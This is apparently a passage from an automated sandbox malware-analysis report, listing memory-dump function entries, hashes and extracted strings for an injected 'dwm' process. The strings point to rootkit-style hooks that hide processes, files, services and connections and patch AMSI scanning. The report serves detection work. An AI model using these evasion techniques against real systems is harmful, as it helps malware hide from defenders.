                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: bdca8bda7c5dfb7893c2609220d437f944bdb23d298c147b6434803ef09f334d
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 3BB1A07221069082EB699F65D9087AAB3B5F744F84F64501AEE8D53F94FF36CD40C362
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 155aa4d9f456daa5ea3c7b8e8ead6d52db64bd2f92368d4ad293a470bb00e7c6
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 5431A176204B809AEB60DF60E8443EE7375F784748F54442ADB8E57B98EF78C658C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 661ed4b192b4d2d055d4a3645d28c793987b4ae472b21c420f8d8299d9bf4ac3
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 5B416E36214F8086EB60DF25E84839E73B4F7887A4F600615EADD47B98EF78C655CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: 37c71513f5cf5599a1d775cccc2396235419aa10ddcf9e95c3dd03e7f94f023b
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: A8416D36214B8096EB60CF65E8443AE73B4F788764F600125EADD47F98DF38C599CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 7a7c8da5176cc6c09b3aa039bc97ae577ecaa5b117708b78e80320ac1fa80808
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: 9DA1E32270468049FB209B75ED883AD7FB1E785B9CF244115DEDD2BE99EB3AC841C712
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: c1f12f0b514c343254ac31443cd378a1cf3a90a2b5d0826bba6c205aebb85a73
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: F8A116227447816AFBB0DB75E8883AD7BB1E781B94F244115DEC8A7F99DB38C481C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: bd11025053fb7aa7a53168d0ab28a33b478d506817012eb9481df5ff4a85e8ef
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 24713C26310B50A6EB70EF65E89869C33B5FB94B88F601115DD8D97F68DF38C584C361
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: cebaff3c61d899f97e1bf93c5b96be8170e2f5278e10bac2761a40080f80a2ee
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: D951C164140A0AB6EB69EFA8EC4E7D43371B758344FA4052394C952E76DF3C869AC373
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 875b6c273a972ce80b51597fc12170985c1e8e6eea07ffb0aadac7a29460f4cc
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 1C516D72210B849AE724DF62E84836AB7B2F788F98F544524DE8E07B58EF3CC559C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: a067508f51625b2c2bae80ebe518ec66c5eea82c160fa1096d00fd055a8bd0a7
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 46515E32210B84AAE765DF62E44835A77B2F798FD8F544124DE8A07B68DF3CC089C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 68197df44c621a720fe3b4e437889c92559270bd35f1cdcc811d724bcb9c4742
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 9331CE22A00B40ABEB21DF52A80C759B3B0F788FD5F650525DE8D43B64EF38C966C361
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 72117d965a548ff4cbc988bc592d1e70a197e30027a532bd1495d658dfa48cf0
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: 7131BF71610B419AEB50EF22A888759B3F1F788F94F644025DE8E83B64EF38C951C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: 26675a9d0e71cc55802d77e91e030b9b538f2f10633933ef70f19f644b80b483
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: D4D18D3360078086EB68DF65D4C93AD3BB0F755798F900116EF8997B9AEB36C181C792
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: 5fa69ced554f89c9fcf9ad212c28b6292f85bd46dc4a9c45599d002d759cce87
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: DFD16B33604B808AEB60DF65984839D77B0F749788F200215EECD5BF9AEB36C991C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: b0034ac9fedc59078a8a7e47df2050e133f12344030f0136cfb4ee7b62c8714e
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: E4D1AD32605B808AEB60DF65D4C93AD77B0F789798F201106EECD97B9AEB75C090C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: 909d86dbda564d8ae0b421eb3c3f6f7ec98a6f59c67c63f828dfe73cbda2f20a
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: 94D1C332604781A6EB70DF65D4893AD37B0F789788F280205EEC957F9ADB35C990C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: ff44b09a0e5900bdfd36588edc80063c4c1a57645fcaaa8ff3b51a3e619e5fa7
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 70D17D32644B84AAEBB0DF65E44839D77B0F795798F200215EACD57F9ADB38C890C712
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 7d35aa4cd65ea18dbe7087ca25c91ca97611a09d7381d338ecd8174d597b1ed3
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 05418173214B80D6E760CF21E44839E77B1F388B98F548119DA8D17B98EF39C949CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 821efa7a87f1f50bac588274c9b0c3efeb7920b4f048bae8d207b7b93b507985
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 8B417133214B84D6E7A4CF61E44839E77B1F388B98F548119DA890BB58DF3CC589CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: 1f079ead6b2a2b9e77380c9f466fe227c451bb9cdf891b07d463228648f3c048
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
